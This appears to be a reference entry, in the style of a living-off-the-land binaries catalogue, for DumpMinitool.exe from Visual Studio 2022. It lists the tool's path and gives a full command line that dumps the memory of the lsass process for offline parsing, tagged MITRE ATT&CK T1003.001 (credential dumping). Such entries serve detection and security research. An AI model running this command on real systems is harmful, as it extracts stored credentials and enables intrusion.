.. /DumpMinitool.exe
Dump tool part Visual Studio 2022
Paths:
- C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions
Resources:
Dump
Creates a memory dump of the lsass process
DumpMinitool.exe --file c:\users\mr.d0x\dump.txt --processId 1132 --dumpType Full
Usecase: Create memory dump and parse it offline
Privileges required: Administrator
OS: Windows 10, Windows 11
MITRE ATT&CK®: T1003.001